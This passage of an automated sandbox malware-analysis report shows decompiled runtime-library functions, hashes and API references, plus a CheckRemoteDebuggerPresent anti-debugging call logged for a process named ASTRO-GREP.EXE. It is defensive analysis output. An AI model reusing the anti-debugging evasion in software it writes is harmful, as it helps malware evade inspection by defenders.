                                                                                                            • String ID:
                                                                                                            • API String ID: 1020059152-0
                                                                                                            • Opcode ID: 3b88fde873793812841fba8bf5669a0301d6dcbab0af5d5318309c06a5bfdf9e
                                                                                                            • Instruction ID: edcb936715fb05da760c6c7c004ef8017b07f8d9aaba292fa0260d41b904b4d0
                                                                                                            • Opcode Fuzzy Hash: 3b88fde873793812841fba8bf5669a0301d6dcbab0af5d5318309c06a5bfdf9e
                                                                                                            • Instruction Fuzzy Hash: 49115933409A04BBCF297FB4BD0669B3BA4AF453F1F20C529F845AA1A0DB70CC4087A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A35AFA, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E00A35AFA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0xa3b748);
				E00A34440(__ebx, __edi, __esi);
				_t28 = E00A33F5E(__ebx, __edx, __edi, _t31);
				_t12 =  *0xa3db20; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00A338F2(_t20, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00A35AAD(_t29,  *0xa3d5e8);
					 *(_t30 - 4) = 0xfffffffe;
					E00A35B67();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00A33F5E(_t20, __edx, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00A32EDA(_t25, _t26, _t29, _t34);
				}
				return E00A34485(_t29);
			}








                                                                                                            0x00a35afa
                                                                                                            0x00a35afa
                                                                                                            0x00a35afa
                                                                                                            0x00a35afa
                                                                                                            0x00a35afa
                                                                                                            0x00a35afc
                                                                                                            0x00a35b01
                                                                                                            0x00a35b0b
                                                                                                            0x00a35b0d
                                                                                                            0x00a35b15
                                                                                                            0x00a35b39
                                                                                                            0x00a35b3b
                                                                                                            0x00a35b41
                                                                                                            0x00a35b4b
                                                                                                            0x00a35b56
                                                                                                            0x00a35b59
                                                                                                            0x00a35b60
                                                                                                            0x00a35b17
                                                                                                            0x00a35b17
                                                                                                            0x00a35b1b
                                                                                                            0x00000000
                                                                                                            0x00a35b1d
                                                                                                            0x00a35b22
                                                                                                            0x00a35b22
                                                                                                            0x00a35b1b
                                                                                                            0x00a35b25
                                                                                                            0x00a35b27
                                                                                                            0x00a35b29
                                                                                                            0x00a35b2b
                                                                                                            0x00a35b30
                                                                                                            0x00a35b38

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00A35B06
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A35B1D
                                                                                                            • __amsg_exit.LIBCMT ref: 00A35B2B
                                                                                                            • __lock.LIBCMT ref: 00A35B3B
                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00A35B4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 938513278-0
                                                                                                            • Opcode ID: 09129bf71b100b0263bfe1c1fe6eac2e56a1001f871b39f952db141da515139f
                                                                                                            • Instruction ID: 08690ae64c0a6ed6a6f23d065e7165a7cb4cff0428773f101832a791dce21cf3
                                                                                                            • Opcode Fuzzy Hash: 09129bf71b100b0263bfe1c1fe6eac2e56a1001f871b39f952db141da515139f
                                                                                                            • Instruction Fuzzy Hash: 7BF0B432D05B10DBDB21BF7CAA03B4DB7A0AF04724F114109F054AB2D2DB2459418A95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A314F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A314F0(void* __ebx, intOrPtr* __ecx, intOrPtr* _a4) {
				void* __esi;
				signed int _t14;
				intOrPtr _t15;
				intOrPtr* _t17;
				char* _t23;
				void* _t34;
				intOrPtr* _t36;
				intOrPtr _t41;
				signed int _t42;
				intOrPtr* _t48;

				_t34 = __ebx;
				_t48 = __ecx;
				_t36 = _a4;
				_t41 =  *((intOrPtr*)(_t36 + 0x10));
				if(_t41 < __ebx) {
					_t14 = E00A32693("invalid string position");
				}
				_t42 = _t41 - _t34;
				if(_t14 < _t42) {
					_t42 = _t14;
				}
				if(_t48 != _t36) {
					if(_t42 > 0xfffffffe) {
						E00A32646("string too long");
					}
					_t15 =  *((intOrPtr*)(_t48 + 0x14));
					if(_t15 >= _t42) {
						if(_t42 != 0) {
							goto L10;
						} else {
							 *(_t48 + 0x10) = _t42;
							if(_t15 < 0x10) {
								_t23 = _t48;
								 *_t23 = 0;
								return _t23;
							} else {
								 *((char*)( *_t48)) = 0;
								return _t48;
							}
						}
					} else {
						E00A31690(_t48, _t42,  *(_t48 + 0x10));
						_t36 = _a4;
						if(_t42 == 0) {
							L22:
							return _t48;
						} else {
							L10:
							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
								_t36 =  *_t36;
							}
							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
								_t17 = _t48;
							} else {
								_t17 =  *_t48;
							}
							E00A353B0(_t17, _t36 + _t34, _t42);
							 *(_t48 + 0x10) = _t42;
							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
								 *((char*)(_t48 + _t42)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t48 + _t42)) = 0;
								return _t48;
							}
						}
					}
				} else {
					E00A31620(_t14 | 0xffffffff, _t42 + _t34, _t48);
					E00A31620(_t34, 0, _t48);
					return _t48;
				}
			}













                                                                                                            0x00a314f0
                                                                                                            0x00a314f4
                                                                                                            0x00a314f6
                                                                                                            0x00a314fa
                                                                                                            0x00a314ff
                                                                                                            0x00a31506
                                                                                                            0x00a31506
                                                                                                            0x00a3150b
                                                                                                            0x00a3150f
                                                                                                            0x00a31511
                                                                                                            0x00a31511
                                                                                                            0x00a31515
                                                                                                            0x00a31536
                                                                                                            0x00a3153d
                                                                                                            0x00a3153d
                                                                                                            0x00a31542
                                                                                                            0x00a31547
                                                                                                            0x00a31572
                                                                                                            0x00000000
                                                                                                            0x00a31574
                                                                                                            0x00a31574
                                                                                                            0x00a3157a
                                                                                                            0x00a31589
                                                                                                            0x00a3158c
                                                                                                            0x00a31591
                                                                                                            0x00a3157c
                                                                                                            0x00a3157e
                                                                                                            0x00a31586
                                                                                                            0x00a31586
                                                                                                            0x00a3157a
                                                                                                            0x00a31549
                                                                                                            0x00a3154f
                                                                                                            0x00a31554
                                                                                                            0x00a31559
                                                                                                            0x00a315c0
                                                                                                            0x00a315c5
                                                                                                            0x00a3155b
                                                                                                            0x00a3155b
                                                                                                            0x00a31563
                                                                                                            0x00a31565
                                                                                                            0x00a31565
                                                                                                            0x00a3156a
                                                                                                            0x00a31594
                                                                                                            0x00a3156c
                                                                                                            0x00a3156c
                                                                                                            0x00a3156c
                                                                                                            0x00a3159b
                                                                                                            0x00a315a7
                                                                                                            0x00a315aa
                                                                                                            0x00a315bc
                                                                                                            0x00000000
                                                                                                            0x00a315ac
                                                                                                            0x00a315ae
                                                                                                            0x00a315b7
                                                                                                            0x00a315b7
                                                                                                            0x00a315aa
                                                                                                            0x00a31559
                                                                                                            0x00a31517
                                                                                                            0x00a3151d
                                                                                                            0x00a31526
                                                                                                            0x00a31530
                                                                                                            0x00a31530

                                                                                                            APIs
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A31506
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326A8
                                                                                                              • Part of subcall function 00A32693: __CxxThrowException@8.LIBCMT ref: 00A326BD
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326CE
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A3153D
                                                                                                              • Part of subcall function 00A32646: std::exception::exception.LIBCMT ref: 00A3265B
                                                                                                              • Part of subcall function 00A32646: __CxxThrowException@8.LIBCMT ref: 00A32670
                                                                                                              • Part of subcall function 00A32646: std::exception::exception.LIBCMT ref: 00A32681
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                            • String ID: invalid string position$string too long
                                                                                                            • API String ID: 1823113695-4289949731
                                                                                                            • Opcode ID: 22ed01a793dcc62ec9c039d7a531c3184a9702a613806080d1aa89a11ea2a3f6
                                                                                                            • Instruction ID: 8d9484e5bca598f46d42170ccc0d324b9cbd5e6b79df5f1c2017f4000020cfbd
                                                                                                            • Opcode Fuzzy Hash: 22ed01a793dcc62ec9c039d7a531c3184a9702a613806080d1aa89a11ea2a3f6
                                                                                                            • Instruction Fuzzy Hash: 8A2191323006108BC7219B6DE841A6AF7A9EBE1761F14093EF152CB281D771DC4183A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A32530, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A32530(void* __eax, intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
				void* __esi;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr* _t24;
				void* _t29;
				signed int _t30;
				intOrPtr* _t33;
				intOrPtr* _t37;
				intOrPtr _t39;

				_t37 = __edi;
				_t30 = _a8;
				_t29 = __eax;
				_t17 =  *((intOrPtr*)(_a4 + 0x10));
				if(_t17 < _t30) {
					_t17 = E00A32693("invalid string position");
				}
				_t18 = _t17 - _t30;
				if(_t18 < _t29) {
					_t29 = _t18;
				}
				_t19 =  *((intOrPtr*)(_t37 + 0x10));
				if((_t30 | 0xffffffff) - _t19 <= _t29) {
					_t19 = E00A32646("string too long");
				}
				if(_t29 == 0) {
					L17:
					return _t37;
				} else {
					_t39 = _t19 + _t29;
					if(E00A315D0(_t39) == 0) {
						L16:
						goto L17;
					} else {
						_t33 = _a4;
						if( *((intOrPtr*)(_t33 + 0x14)) >= 0x10) {
							_t33 =  *_t33;
						}
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t24 = _t37;
						} else {
							_t24 =  *_t37;
						}
						E00A353B0( *((intOrPtr*)(_t37 + 0x10)) + _t24, _t33 + _a8, _t29);
						 *((intOrPtr*)(_t37 + 0x10)) = _t39;
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							 *((char*)(_t37 + _t39)) = 0;
							goto L16;
						} else {
							 *((char*)( *_t37 + _t39)) = 0;
							return _t37;
						}
					}
				}
			}













                                                                                                            0x00a32530
                                                                                                            0x00a32533
                                                                                                            0x00a32537
                                                                                                            0x00a3253c
                                                                                                            0x00a32541
                                                                                                            0x00a32548
                                                                                                            0x00a32548
                                                                                                            0x00a3254d
                                                                                                            0x00a32551
                                                                                                            0x00a32553
                                                                                                            0x00a32553
                                                                                                            0x00a32555
                                                                                                            0x00a3255f
                                                                                                            0x00a32566
                                                                                                            0x00a32566
                                                                                                            0x00a3256d
                                                                                                            0x00a325c9
                                                                                                            0x00a325cd
                                                                                                            0x00a3256f
                                                                                                            0x00a32570
                                                                                                            0x00a3257c
                                                                                                            0x00a325c8
                                                                                                            0x00000000
                                                                                                            0x00a3257e
                                                                                                            0x00a3257e
                                                                                                            0x00a32589
                                                                                                            0x00a3258b
                                                                                                            0x00a3258b
                                                                                                            0x00a32590
                                                                                                            0x00a32596
                                                                                                            0x00a32592
                                                                                                            0x00a32592
                                                                                                            0x00a32592
                                                                                                            0x00a325a3
                                                                                                            0x00a325af
                                                                                                            0x00a325b2
                                                                                                            0x00a325c4
                                                                                                            0x00000000
                                                                                                            0x00a325b4
                                                                                                            0x00a325b6
                                                                                                            0x00a325bf
                                                                                                            0x00a325bf
                                                                                                            0x00a325b2
                                                                                                            0x00a3257c

                                                                                                            APIs
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A32548
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326A8
                                                                                                              • Part of subcall function 00A32693: __CxxThrowException@8.LIBCMT ref: 00A326BD
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326CE
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A32566
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                            • String ID: invalid string position$string too long
                                                                                                            • API String ID: 963545896-4289949731
                                                                                                            • Opcode ID: 7c0512341152f993da370c7d04eb20219b19a93ed79a450280c0370a59d232cd
                                                                                                            • Instruction ID: 6cf20c5be40aa8e81c0a37d60efa1997e3d9a94db15a01e4c9251a07d9e1d798
                                                                                                            • Opcode Fuzzy Hash: 7c0512341152f993da370c7d04eb20219b19a93ed79a450280c0370a59d232cd
                                                                                                            • Instruction Fuzzy Hash: 1E1191313002019FCB08DF6DE9A1B69B3A9BF94314F54092DF516CB341E774EA54C7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A31620, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A31620(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _t9;
				void* _t10;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t22;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t22 = __ecx;
				_t28 = __eax;
				_t9 =  *((intOrPtr*)(__esi + 0x10));
				if(_t9 < __ecx) {
					_t9 = E00A32693("invalid string position");
				}
				_t10 = _t9 - _t22;
				if(_t10 < _t28) {
					_t28 = _t10;
				}
				if(_t28 == 0) {
					L14:
					return _t29;
				} else {
					_t25 =  *((intOrPtr*)(_t29 + 0x14));
					if(_t25 < 0x10) {
						_t18 = _t29;
					} else {
						_t18 =  *_t29;
					}
					if(_t25 < 0x10) {
						_t26 = _t29;
					} else {
						_t26 =  *_t29;
					}
					E00A32850(_t26 + _t22, _t18 + _t22 + _t28, _t10 - _t28);
					_t15 =  *((intOrPtr*)(_t29 + 0x10)) - _t28;
					 *((intOrPtr*)(_t29 + 0x10)) = _t15;
					if( *((intOrPtr*)(_t29 + 0x14)) < 0x10) {
						 *((char*)(_t29 + _t15)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t29 + _t15)) = 0;
						return _t29;
					}
				}
			}












                                                                                                            0x00a31620
                                                                                                            0x00a31620
                                                                                                            0x00a31621
                                                                                                            0x00a31623
                                                                                                            0x00a31628
                                                                                                            0x00a3162f
                                                                                                            0x00a3162f
                                                                                                            0x00a31634
                                                                                                            0x00a31638
                                                                                                            0x00a3163a
                                                                                                            0x00a3163a
                                                                                                            0x00a3163e
                                                                                                            0x00a3168c
                                                                                                            0x00a3168f
                                                                                                            0x00a31640
                                                                                                            0x00a31640
                                                                                                            0x00a31647
                                                                                                            0x00a3164d
                                                                                                            0x00a31649
                                                                                                            0x00a31649
                                                                                                            0x00a31649
                                                                                                            0x00a31652
                                                                                                            0x00a31658
                                                                                                            0x00a31654
                                                                                                            0x00a31654
                                                                                                            0x00a31654
                                                                                                            0x00a31665
                                                                                                            0x00a31670
                                                                                                            0x00a31676
                                                                                                            0x00a3167a
                                                                                                            0x00a31688
                                                                                                            0x00000000
                                                                                                            0x00a3167c
                                                                                                            0x00a3167e
                                                                                                            0x00a31685
                                                                                                            0x00a31685
                                                                                                            0x00a3167a

                                                                                                            APIs
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A3162F
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326A8
                                                                                                              • Part of subcall function 00A32693: __CxxThrowException@8.LIBCMT ref: 00A326BD
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326CE
                                                                                                            • _memmove.LIBCMT ref: 00A31665
                                                                                                            Strings
                                                                                                            • invalid string position, xrefs: 00A3162A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                            • String ID: invalid string position
                                                                                                            • API String ID: 1785806476-1799206989
                                                                                                            • Opcode ID: 8b1f286b4fd7f73d50f42f59217624c58145e753a3f6ef03411990d23250eca2
                                                                                                            • Instruction ID: d97769163d464f3f5f37773089003a487b88dab7a5b9d6826592778976dad81e
                                                                                                            • Opcode Fuzzy Hash: 8b1f286b4fd7f73d50f42f59217624c58145e753a3f6ef03411990d23250eca2
                                                                                                            • Instruction Fuzzy Hash: 310162313006404BD7258AACED9262AB2E7DBD5704F2D4E2CF091CBB45D771DC428794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A37C25, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00A37C25(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00A3770A(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00A33F5E(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00A33F5E(__ebx, __edx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00A376E3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00A379BD(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                                                            0x00a37c25
                                                                                                            0x00a37c28
                                                                                                            0x00a37c2e
                                                                                                            0x00a37c3c
                                                                                                            0x00a37c42
                                                                                                            0x00a37c4a
                                                                                                            0x00a37c56
                                                                                                            0x00a37c5e
                                                                                                            0x00a37c66
                                                                                                            0x00a37c7a
                                                                                                            0x00a37c7c
                                                                                                            0x00a37c80
                                                                                                            0x00a37c85
                                                                                                            0x00a37c8b
                                                                                                            0x00a37c8d
                                                                                                            0x00a37c8f
                                                                                                            0x00a37c92
                                                                                                            0x00000000
                                                                                                            0x00a37c99
                                                                                                            0x00a37c8d
                                                                                                            0x00a37c80
                                                                                                            0x00a37c7a
                                                                                                            0x00a37c66
                                                                                                            0x00a37c9a

                                                                                                            APIs
                                                                                                              • Part of subcall function 00A3770A: __getptd.LIBCMT ref: 00A37710
                                                                                                              • Part of subcall function 00A3770A: __getptd.LIBCMT ref: 00A37720
                                                                                                            • __getptd.LIBCMT ref: 00A37C34
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A37C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 803148776-1018135373
                                                                                                            • Opcode ID: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                                                                            • Instruction ID: 7f52f4f91532d6bbfcec40cb40d2018aa4a5c40a0f98372097cfec97c66608ea
                                                                                                            • Opcode Fuzzy Hash: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                                                                            • Instruction Fuzzy Hash: 120181B5809305CFDF349F25C680AACB3B5BF11311F54542DF4456A651DB318980CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: ASTRO-GREP.EXE PID: 5416 Parent PID: 4156 ASTRO-GREP.EXECOMMON

                                                                                                            Executed Functions

                                                                                                            Function 00F2E5B0, Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <l$D0l
                                                                                                            • API String ID: 0-52272047
                                                                                                            • Opcode ID: 49702be116a9c2351fbd818cd1a01bc7409ac5117b8520f9b64474fe371e5650
                                                                                                            • Instruction ID: 835613f89797e2d4072e3f0bc60d0c0ea61c69188c06f20dddd031e6d2820130
                                                                                                            • Opcode Fuzzy Hash: 49702be116a9c2351fbd818cd1a01bc7409ac5117b8520f9b64474fe371e5650
                                                                                                            • Instruction Fuzzy Hash: 16A1B935F042188BCB08ABB4A8547BE76B7BFC9704B25892ED446DB385DF34CC05A791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F2B258, Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <l
                                                                                                            • API String ID: 0-2278483159
                                                                                                            • Opcode ID: 6b854a349eb6b8455270a5062868ec62ac5a2d5d82e98ee9b9f616b35b347f95
                                                                                                            • Instruction ID: 969788f9fe4786b9081b3a9c81afb0c93f64d49b7c9b6304a6f7334204224880
                                                                                                            • Opcode Fuzzy Hash: 6b854a349eb6b8455270a5062868ec62ac5a2d5d82e98ee9b9f616b35b347f95
                                                                                                            • Instruction Fuzzy Hash: 43D16A71E002198FCB14DFA8D484AAEFBF2FF88314F15855AE915AB351DB34AD46CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F2BC64, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00F2D64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: b6eb7dcd61505f9ce7daad8ecbe51c89b5ffc89879f554bf96ec39236087dfcc
                                                                                                            • Instruction ID: c591fb7bd6d9401e9f637e744cfbd23124ed66b9581f7a728877f0284a675c57
                                                                                                            • Opcode Fuzzy Hash: b6eb7dcd61505f9ce7daad8ecbe51c89b5ffc89879f554bf96ec39236087dfcc
                                                                                                            • Instruction Fuzzy Hash: 0E2148B19042198FCB10CF9AD885BEEBBF4AF49324F15846AE459B7340D778A944CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F27878, Relevance: .3, Instructions: 281COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37bf32b2af21fc66849cfddd3f94aa18e0f57e0b9b3bd8be433052dfe62e7af5
                                                                                                            • Instruction ID: 683b9b47456942537aa79ca4e2fb5215246e88fa020f63df0cbc1ba78ff891c2
                                                                                                            • Opcode Fuzzy Hash: 37bf32b2af21fc66849cfddd3f94aa18e0f57e0b9b3bd8be433052dfe62e7af5
                                                                                                            • Instruction Fuzzy Hash: AEB17C70E043198FDB10EFA9D8857EEBBF2AF88324F148129E815A7354EB749845DF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F28148, Relevance: .3, Instructions: 266COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a230e22d1794eb9e8144ff6091165a236013c56081391b44a1114de9a46328eb
                                                                                                            • Instruction ID: 88c9185274f111b787c67b659f8082fee8b922fda3022e7596662e1a006bb0a5
                                                                                                            • Opcode Fuzzy Hash: a230e22d1794eb9e8144ff6091165a236013c56081391b44a1114de9a46328eb
                                                                                                            • Instruction Fuzzy Hash: A6B18D70E01229CFDB10DFA9E8857DDBBF2BF88794F148129E415A7294DB349846DB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F22458, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00F24E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
